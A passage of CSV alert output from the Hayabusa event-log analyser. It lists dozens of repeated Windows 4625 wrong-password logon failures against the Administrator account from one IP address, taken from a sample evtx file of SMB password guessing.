+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: 
